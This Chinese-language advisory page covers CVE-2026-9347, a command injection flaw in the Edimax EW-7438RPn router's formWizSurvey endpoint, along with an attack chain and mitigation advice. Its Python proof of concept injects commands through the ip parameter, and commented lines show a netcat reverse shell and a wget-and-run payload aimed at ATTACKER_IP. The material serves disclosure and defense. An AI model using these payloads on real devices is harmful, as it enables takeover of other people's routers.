IPBUF安全漏洞报告
English
CVE-2026-9347 CVSS 6.3 中危

CVE-2026-9347: Edimax EW-7438RPn formWizSurvey OS命令注入漏洞

披露日期: 2026-05-24

漏洞信息

漏洞编号
CVE-2026-9347
漏洞类型
OS命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Edimax EW-7438RPn

相关标签

OS命令注入EdimaxEW-7438RPn路由器漏洞Web漏洞CVE-2026-9347命令注入网络设备IoT安全

漏洞概述

CVE-2026-9347是影响Edimax EW-7438RPn设备的中危安全漏洞,存在于设备的Web管理界面中。该漏洞允许未经授权的远程攻击者通过构造恶意请求,在受影响设备的操作系统上执行任意命令。漏洞位于/goform/formWizSurvey端点,攻击者可通过操纵ip、mask、gateway等参数注入恶意OS命令。由于该漏洞无需高权限即可利用,且可远程触发,因此对使用该设备的用户构成较大安全风险。Edimax公司已被通知此漏洞,但截至披露日期未做出任何回应或提供修复方案。漏洞利用代码已公开,增加了被恶意利用的潜在风险。

技术细节

该漏洞为典型的OS命令注入(OS Command Injection)问题,存在于Edimax EW-7438RPn设备的Web服务组件中。具体来说,漏洞位于formWizSurvey函数,该函数负责处理网络设置相关请求。攻击者可以通过向/goform/formWizSurvey端点发送精心构造的HTTP POST请求,在ip、mask、gateway等参数中嵌入恶意OS命令。由于应用程序未对用户输入进行充分的输入验证和命令隔离,攻击者注入的命令将被传递给底层系统shell执行。攻击者可以利用此漏洞执行任意系统命令,包括但不限于读取敏感配置文件、修改系统设置、建立后门连接或完全控制设备。由于设备通常以提升的权限运行Web服务,攻击者可能获得root级别的系统访问权限。

攻击链分析

STEP 1
信息收集
攻击者识别目标设备为Edimax EW-7438RPn,确认Web管理界面可访问
STEP 2
认证
使用低权限凭据登录设备Web管理界面或利用无需认证的漏洞端点
STEP 3
构造恶意请求
构造包含OS命令注入payload的HTTP POST请求,目标端点为/goform/formWizSurvey,参数包括ip、mask、gateway
STEP 4
命令执行
发送恶意请求后,设备webs组件将用户输入传递给系统shell执行,实现任意命令执行
STEP 5
持久化控制
攻击者可通过植入后门、修改启动脚本或建立远程连接维持对设备的持续控制

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-9347 PoC - Edimax EW-7438RPn OS Command Injection # Target: Edimax EW-7438RPn device # Vulnerable endpoint: /goform/formWizSurvey # Vulnerable parameters: ip, mask, gateway target_ip = "192.168.0.1" # Default Edimax router IP target_url = f"http://{target_ip}/goform/formWizSurvey" # Payload: Inject OS command to create a test file # The command will be executed with root privileges payload_ip = "127.0.0.1;touch /tmp/pwned_$(date +%s)" payload_mask = "255.255.255.0" payload_gateway = "192.168.0.1" data = { "ip": payload_ip, "mask": payload_mask, "gateway": payload_gateway } print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload: {payload_ip}") try: response = requests.post(target_url, data=data, timeout=10) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Exploit sent successfully") print("[+] Check if /tmp/pwned_* file exists on target device") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Reverse shell payload example (for authorized testing only): # payload_ip = "127.0.0.1;nc -e /bin/sh ATTACKER_IP 4444" # payload_ip = "127.0.0.1;wget http://ATTACKER_IP/shell.sh -O /tmp/sh.sh && sh /tmp/sh.sh"

影响范围

Edimax EW-7438RPn <= 1.31

防御指南

临时缓解措施
目前厂商尚未提供修复补丁。建议用户采取以下临时措施:1) 限制对设备管理界面的网络访问,仅允许受信任的IP地址访问;2) 更改设备默认管理凭据;3) 禁用不必要的远程管理功能;4) 监控设备日志以检测可疑活动;5) 考虑使用VPN连接进行设备管理;6) 如果设备不再使用,建议停止运行或更换为已获得安全支持的设备。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表